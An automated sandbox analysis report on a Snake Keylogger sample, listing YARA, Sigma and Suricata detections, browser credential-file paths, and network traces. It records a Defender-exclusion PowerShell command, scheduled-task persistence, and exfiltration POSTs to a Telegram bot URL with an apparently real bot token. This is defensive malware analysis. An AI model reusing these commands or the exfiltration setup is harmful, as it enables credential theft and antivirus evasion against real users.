11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19a02:$x1: $%SMTPDV$ 0x3a222:$x1: $%SMTPDV$ 0x183d4:$x2: $#TheHashHere%& 0x38bf4:$x2: $#TheHashHere%& 0x199aa:$x3: %FTPDV$ 0x3a1ca:$x3: %FTPDV$ 0x18374:$x4: $%TelegramDv$ 0x38b94:$x4: $%TelegramDv$ 0x15bb5:$x5: KeyLoggerEventArgs 0x15f4a:$x5: KeyLoggerEventArgs 0x363d5:$x5: KeyLoggerEventArgs 0x3676a:$x5: KeyLoggerEventArgs 0x199ce:$m2: Clipboard Logs ID 0x19c0c:$m2: Screenshot Logs ID 0x19d1c:$m2: keystroke Logs ID 0x3a1ee:$m2: Clipboard Logs ID 0x3a42c:$m2: Screenshot Logs ID 0x3a53c:$m2: keystroke Logs ID 0x19ff6:$m3: SnakePW 0x3a816:$m3: SnakePW 0x19be4:$m4: \SnakeKeylogger\
0.2.rPO0977-6745.exe.421a090.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c3f0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cc10:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b622:$a3: \Google\Chrome\User Data\Default\Login Data 0x3be42:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ba55:$a4: \Orbitum\User Data\Default\Login Data 0x3c275:$a4: \Orbitum\User Data\Default\Login Data 0x1ca94:$a5: \Kometa\User Data\Default\Login Data 0x3d2b4:$a5: \Kometa\User Data\Default\Login Data
0.2.rPO0977-6745.exe.421a090.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15558:$s1: UnHook 0x35d78:$s1: UnHook 0x1555f:$s2: SetHook 0x35d7f:$s2: SetHook 0x15567:$s3: CallNextHook 0x35d87:$s3: CallNextHook 0x15574:$s4: _hook 0x35d94:$s4: _hook
0.2.rPO0977-6745.exe.421a090.2.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19a02:$x1: $%SMTPDV$ 0x3a222:$x1: $%SMTPDV$ 0x183d4:$x2: $#TheHashHere%& 0x38bf4:$x2: $#TheHashHere%& 0x199aa:$x3: %FTPDV$ 0x3a1ca:$x3: %FTPDV$ 0x18374:$x4: $%TelegramDv$ 0x38b94:$x4: $%TelegramDv$ 0x15bb5:$x5: KeyLoggerEventArgs 0x15f4a:$x5: KeyLoggerEventArgs 0x363d5:$x5: KeyLoggerEventArgs 0x3676a:$x5: KeyLoggerEventArgs 0x199ce:$m2: Clipboard Logs ID 0x19c0c:$m2: Screenshot Logs ID 0x19d1c:$m2: keystroke Logs ID 0x3a1ee:$m2: Clipboard Logs ID 0x3a42c:$m2: Screenshot Logs ID 0x3a53c:$m2: keystroke Logs ID 0x19ff6:$m3: SnakePW 0x3a816:$m3: SnakePW 0x19be4:$m4: \SnakeKeylogger\
0.2.rPO0977-6745.exe.41f9670.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.rPO0977-6745.exe.41f9670.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.rPO0977-6745.exe.41f9670.3.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.rPO0977-6745.exe.41f9670.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14984:$a1: get_encryptedPassword 0x353a4:$a1: get_encryptedPassword 0x55bc4:$a1: get_encryptedPassword 0x14c70:$a2: get_encryptedUsername 0x35690:$a2: get_encryptedUsername 0x55eb0:$a2: get_encryptedUsername 0x14790:$a3: get_timePasswordChanged 0x351b0:$a3: get_timePasswordChanged 0x559d0:$a3: get_timePasswordChanged 0x1488b:$a4: get_passwordField 0x352ab:$a4: get_passwordField 0x55acb:$a4: get_passwordField 0x1499a:$a5: set_encryptedPassword 0x353ba:$a5: set_encryptedPassword 0x55bda:$a5: set_encryptedPassword 0x15fe7:$a7: get_logins 0x36a07:$a7: get_logins 0x57227:$a7: get_logins 0x15f4a:$a10: KeyLoggerEventArgs 0x3696a:$a10: KeyLoggerEventArgs 0x5718a:$a10: KeyLoggerEventArgs
0.2.rPO0977-6745.exe.41f9670.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c3f0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ce10:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x5d630:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b622:$a3: \Google\Chrome\User Data\Default\Login Data 0x3c042:$a3: \Google\Chrome\User Data\Default\Login Data 0x5c862:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ba55:$a4: \Orbitum\User Data\Default\Login Data 0x3c475:$a4: \Orbitum\User Data\Default\Login Data 0x5cc95:$a4: \Orbitum\User Data\Default\Login Data 0x1ca94:$a5: \Kometa\User Data\Default\Login Data 0x3d4b4:$a5: \Kometa\User Data\Default\Login Data 0x5dcd4:$a5: \Kometa\User Data\Default\Login Data
0.2.rPO0977-6745.exe.41f9670.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15558:$s1: UnHook 0x35f78:$s1: UnHook 0x56798:$s1: UnHook 0x1555f:$s2: SetHook 0x35f7f:$s2: SetHook 0x5679f:$s2: SetHook 0x15567:$s3: CallNextHook 0x35f87:$s3: CallNextHook 0x567a7:$s3: CallNextHook 0x15574:$s4: _hook 0x35f94:$s4: _hook 0x567b4:$s4: _hook
0.2.rPO0977-6745.exe.41f9670.3.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19a02:$x1: $%SMTPDV$ 0x3a422:$x1: $%SMTPDV$ 0x5ac42:$x1: $%SMTPDV$ 0x183d4:$x2: $#TheHashHere%& 0x38df4:$x2: $#TheHashHere%& 0x59614:$x2: $#TheHashHere%& 0x199aa:$x3: %FTPDV$ 0x3a3ca:$x3: %FTPDV$ 0x5abea:$x3: %FTPDV$ 0x18374:$x4: $%TelegramDv$ 0x38d94:$x4: $%TelegramDv$ 0x595b4:$x4: $%TelegramDv$ 0x15bb5:$x5: KeyLoggerEventArgs 0x15f4a:$x5: KeyLoggerEventArgs 0x365d5:$x5: KeyLoggerEventArgs 0x3696a:$x5: KeyLoggerEventArgs 0x56df5:$x5: KeyLoggerEventArgs 0x5718a:$x5: KeyLoggerEventArgs 0x199ce:$m2: Clipboard Logs ID 0x19c0c:$m2: Screenshot Logs ID 0x19d1c:$m2: keystroke Logs ID
11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14984:$a1: get_encryptedPassword 0x353a4:$a1: get_encryptedPassword 0x55bc4:$a1: get_encryptedPassword 0x14c70:$a2: get_encryptedUsername 0x35690:$a2: get_encryptedUsername 0x55eb0:$a2: get_encryptedUsername 0x14790:$a3: get_timePasswordChanged 0x351b0:$a3: get_timePasswordChanged 0x559d0:$a3: get_timePasswordChanged 0x1488b:$a4: get_passwordField 0x352ab:$a4: get_passwordField 0x55acb:$a4: get_passwordField 0x1499a:$a5: set_encryptedPassword 0x353ba:$a5: set_encryptedPassword 0x55bda:$a5: set_encryptedPassword 0x15fe7:$a7: get_logins 0x36a07:$a7: get_logins 0x57227:$a7: get_logins 0x15f4a:$a10: KeyLoggerEventArgs 0x3696a:$a10: KeyLoggerEventArgs 0x5718a:$a10: KeyLoggerEventArgs
11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c3f0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ce10:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x5d630:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b622:$a3: \Google\Chrome\User Data\Default\Login Data 0x3c042:$a3: \Google\Chrome\User Data\Default\Login Data 0x5c862:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ba55:$a4: \Orbitum\User Data\Default\Login Data 0x3c475:$a4: \Orbitum\User Data\Default\Login Data 0x5cc95:$a4: \Orbitum\User Data\Default\Login Data 0x1ca94:$a5: \Kometa\User Data\Default\Login Data 0x3d4b4:$a5: \Kometa\User Data\Default\Login Data 0x5dcd4:$a5: \Kometa\User Data\Default\Login Data
11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15558:$s1: UnHook 0x35f78:$s1: UnHook 0x56798:$s1: UnHook 0x1555f:$s2: SetHook 0x35f7f:$s2: SetHook 0x5679f:$s2: SetHook 0x15567:$s3: CallNextHook 0x35f87:$s3: CallNextHook 0x567a7:$s3: CallNextHook 0x15574:$s4: _hook 0x35f94:$s4: _hook 0x567b4:$s4: _hook
11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19a02:$x1: $%SMTPDV$ 0x3a422:$x1: $%SMTPDV$ 0x5ac42:$x1: $%SMTPDV$ 0x183d4:$x2: $#TheHashHere%& 0x38df4:$x2: $#TheHashHere%& 0x59614:$x2: $#TheHashHere%& 0x199aa:$x3: %FTPDV$ 0x3a3ca:$x3: %FTPDV$ 0x5abea:$x3: %FTPDV$ 0x18374:$x4: $%TelegramDv$ 0x38d94:$x4: $%TelegramDv$ 0x595b4:$x4: $%TelegramDv$ 0x15bb5:$x5: KeyLoggerEventArgs 0x15f4a:$x5: KeyLoggerEventArgs 0x365d5:$x5: KeyLoggerEventArgs 0x3696a:$x5: KeyLoggerEventArgs 0x56df5:$x5: KeyLoggerEventArgs 0x5718a:$x5: KeyLoggerEventArgs 0x199ce:$m2: Clipboard Logs ID 0x19c0c:$m2: Screenshot Logs ID 0x19d1c:$m2: keystroke Logs ID
Click to see the 47 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rPO0977-6745.exe", ParentImage: C:\Users\user\Desktop\rPO0977-6745.exe, ParentProcessId: 1540, ParentProcessName: rPO0977-6745.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe", ProcessId: 7012, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp547C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp547C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe, ParentImage: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe, ParentProcessId: 7276, ParentProcessName: EDyxAgkldisLe.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp547C.tmp", ProcessId: 7928, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp44AD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp44AD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\rPO0977-6745.exe", ParentImage: C:\Users\user\Desktop\rPO0977-6745.exe, ParentProcessId: 1540, ParentProcessName: rPO0977-6745.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp44AD.tmp", ProcessId: 6668, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rPO0977-6745.exe", ParentImage: C:\Users\user\Desktop\rPO0977-6745.exe, ParentProcessId: 1540, ParentProcessName: rPO0977-6745.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe", ProcessId: 7012, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp44AD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp44AD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\rPO0977-6745.exe", ParentImage: C:\Users\user\Desktop\rPO0977-6745.exe, ParentProcessId: 1540, ParentProcessName: rPO0977-6745.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp44AD.tmp", ProcessId: 6668, ProcessName: schtasks.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ETPRO MALWARE Snake Keylogger Telegram Exfil - Source IP: 192.168.2.7 - Destination IP: 149.154.167.220

Timestamp:	2024-07-24T15:08:36.970823+0200
SID:	2853006
Source Port:	49735
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Snake Keylogger Telegram Exfil - Source IP: 192.168.2.7 - Destination IP: 149.154.167.220

Timestamp:	2024-07-24T15:08:44.499518+0200
SID:	2853006
Source Port:	49741
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000017.00000002.3693041192.0000000002791000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendMessage?chat_id=5535403842"}
Source: rPO0977-6745.exe.2916.10.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe

ReversingLabs: Detection: 44%

Multi AV Scanner detection for submitted file

Source: rPO0977-6745.exe

ReversingLabs: Detection: 44%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: rPO0977-6745.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: rPO0977-6745.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49704 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49713 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49741 version: TLS 1.2

Source: rPO0977-6745.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: ikFw.pdbSHA256 source: rPO0977-6745.exe, EDyxAgkldisLe.exe.0.dr
Source:	Binary string: ikFw.pdb source: rPO0977-6745.exe, EDyxAgkldisLe.exe.0.dr

Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 4x nop then jmp 08D1938Bh	0_2_08D195B6
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 4x nop then jmp 0144E61Fh	10_2_0144E431
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 4x nop then jmp 0144EFA9h	10_2_0144E431
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 4x nop then jmp 0144FA39h	10_2_0144F778
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_0144E005
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_0144D7F0
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_0144DE23
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 4x nop then jmp 06BB88EDh	10_2_06BB85B0
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 4x nop then jmp 06BB6119h	10_2_06BB5E70
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 4x nop then jmp 06BB72A2h	10_2_06BB6FF8
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 4x nop then jmp 06BB69C9h	10_2_06BB6720
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 4x nop then jmp 06BB0741h	10_2_06BB0498
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 4x nop then jmp 06BB76F9h	10_2_06BB7450
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 4x nop then jmp 06BB5869h	10_2_06BB55C0
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 4x nop then jmp 06BB7FA9h	10_2_06BB7D00
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 4x nop then jmp 06BB6571h	10_2_06BB62C8
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 4x nop then jmp 06BB5CC1h	10_2_06BB5A18
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 4x nop then jmp 06BB6E21h	10_2_06BB6B78
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	10_2_06BB3360
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	10_2_06BB3350
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 4x nop then jmp 06BB7B51h	10_2_06BB78A8
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 4x nop then jmp 06BB0B99h	10_2_06BB08F0
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 4x nop then jmp 06BB02E9h	10_2_06BB0040
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 4x nop then jmp 06BB8401h	10_2_06BB8158
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 4x nop then jmp 06BB53E9h	10_2_06BB5140
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 4x nop then jmp 08728633h	11_2_0872885E
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 4x nop then jmp 00E4E61Fh	23_2_00E4E431
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 4x nop then jmp 00E4EFA9h	23_2_00E4E431
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 4x nop then jmp 00E4FA39h	23_2_00E4F77F
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	23_2_00E4D7F0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 4x nop then jmp 064E88EDh	23_2_064E85B0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 4x nop then jmp 064E6119h	23_2_064E5E70
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 4x nop then jmp 064E5CC1h	23_2_064E5A18
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 4x nop then jmp 064E6571h	23_2_064E62C8
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	23_2_064E3350
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	23_2_064E3360
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 4x nop then jmp 064E6E21h	23_2_064E6B78
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 4x nop then jmp 064E69C9h	23_2_064E6720
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 4x nop then jmp 064E72A2h	23_2_064E6FF8
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 4x nop then jmp 064E02E9h	23_2_064E0040
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 4x nop then jmp 064E76F9h	23_2_064E7450
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 4x nop then jmp 064E0B99h	23_2_064E08F0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 4x nop then jmp 064E0741h	23_2_064E0498
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 4x nop then jmp 064E7B51h	23_2_064E78A8
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 4x nop then jmp 064E53E9h	23_2_064E5140
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 4x nop then jmp 064E8401h	23_2_064E8158
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 4x nop then jmp 064E7FA9h	23_2_064E7D00
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 4x nop then jmp 064E5869h	23_2_064E55C0

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: POST /bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendDocument?chat_id=5535403842&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcac7a674eafb1Host: api.telegram.orgContent-Length: 551Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: POST /bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendDocument?chat_id=5535403842&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcac9db89d7b60Host: api.telegram.orgContent-Length: 551Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
